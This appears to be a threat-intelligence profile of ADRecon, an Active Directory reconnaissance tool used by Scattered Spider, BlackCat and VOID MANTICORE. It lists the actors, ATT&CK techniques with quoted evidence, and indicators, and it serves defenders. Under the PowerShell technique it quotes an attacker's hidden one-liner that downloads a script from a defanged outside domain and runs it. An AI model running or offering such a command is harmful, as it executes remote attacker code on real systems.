
ADRecon

ADRecon is an open-source, PowerShell-based Active Directory reconnaissance tool used to gather extensive information about AD environments. According to the cited reporting, it can enumerate ACLs, DNS zones, BitLocker recovery keys, LAPS passwords, domain accounts, and SPN credential hashes. It is referenced as ADRecon or ADRecon.ps1, and in some intrusions under renamed script names such as dra.ps1 and C:\osit\r.ps1.

Multiple threat actors and intrusion sets have been observed using it for reconnaissance of Active Directory environments, including UNC3944 / Octo Tempest / Scattered Spider-related activity, VOID MANTICORE, and BlackCat (ALPHV) intrusions or affiliates. In the cited incidents, ADRecon was run after initial access, during post-compromise discovery, to enumerate the domain, support privilege escalation toward Domain Admin, and enable broader lateral movement or destructive actions. It has been seen alongside other AD enumeration tools such as ADExplorer, SharpHound, PingCastle, and ADFind, and alongside credential theft and defense evasion activity such as LSASS dumping, registry hive export, disabling Windows Defender, and use of Mimikatz.

High-confidence indicators from the cited content are the tool name ADRecon, the PowerShell script name ADRecon.ps1, and renamed executions such as dra.ps1 and C:\osit\r.ps1.


THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers.
Scattered Spider

UNC3944 will also use network reconnaissance tools like ADRecon, ADExplorer, and SharpHound.

Source: Mandiant Threat Intelligence (cloud.google.com)
BlackCat

The file was identified as ‘ADRecon’, an open-source PowerShell tool specifically designed to gather extensive information about Active Directory (AD) environments, including ACLs, DNS zones, BitLocker recovery keys, LAPS passwords, Domain accounts, and SPN credential hashes.

Source: Sygnia (sygnia.co)
Handala

VOID MANTICORE has utilized ADRecon to enumerate the Active Directory environment.

Source: MITRE ATT&CK (attack.mitre.org)
MITRE ATT&CK

Techniques & procedures

12 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

1 technique
T1059.001 PowerShell (evidence: 2)

The attackers launched the Windows command interpreter... cmd /c powershell.exe -ep bypass -w hidden -c iex ((New-Object Net.WebClient).DownloadString('http://web-telegram[.]uk/vivo.txt'))

Stealth

1 technique
T1070.004 File Deletion (evidence: 1)

the threat actor uploaded the ‘netscan.exe’ file to the same folder, used it to scan the domain, and deleted it after the scan activity was completed... the file no longer existed after execution – presumably it was deleted by the threat actor.

Discovery

10 techniques
T1018 Remote System Discovery (evidence: 6)

Additional tradecraft and techniques: PingCastle and ADRecon to perform reconnaissance of Active Directory.

T1033 System Owner/User Discovery (evidence: 1)

Initial bulk-export of users, groups, and device information is closely followed by enumerating data and resources readily available to the user’s profile... AAD bulk downloads of user, groups, and devices.

T1046 Network Service Discovery (evidence: 2)

UNC3944 will also use network reconnaissance tools like ADRecon, ADExplorer, and SharpHound.

T1069 Permission Groups Discovery (evidence: 1)

Attackers query directories to extract sensitive information such as user accounts, group memberships and permissions... Some common types of LDAP enumeration that are important to monitor include: Admin enumeration: Queries targeting administrative accounts and privileges

T1069.002 Domain Groups (evidence: 1)

Later, the threat actor utilized a user account to remotely deploy Cobalt Strike Beacon on a server in a third domain, followed by network scans and enumeration of the Admins group in the new domain.

T1082 System Information Discovery (evidence: 1)

Upon initial compromise, UNC3944 is known to search for documentation on topics such as: user provisioning, MFA and/or device registration, network diagrams, and shared credentials in documents or spreadsheets.

T1083 File and Directory Discovery (evidence: 1)

The threat actor leveraged the SoftPerfect tool to perform several manual reconnaissance activities, which included searching for passwords in Group Policy xml files, accessing remote folders via Windows Explorer...

T1087 Account Discovery (evidence: 3)

UNC3944 is known to search for documentation on topics such as: user provisioning, MFA and/or device registration...

T1087.002 Domain Account (evidence: 3)

Description from ATT&CK: Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.

T1482 Domain Trust Discovery (evidence: 3)

UNC3944 will also use network reconnaissance tools like ADRecon, ADExplorer, and SharpHound.

INDICATORS OF COMPROMISE

IOCs tracked for this family

1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups.

Hashes (1 tracked)

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Type      Value                          Latest sighting
hash.md5  (not shown on the public page) 5 years ago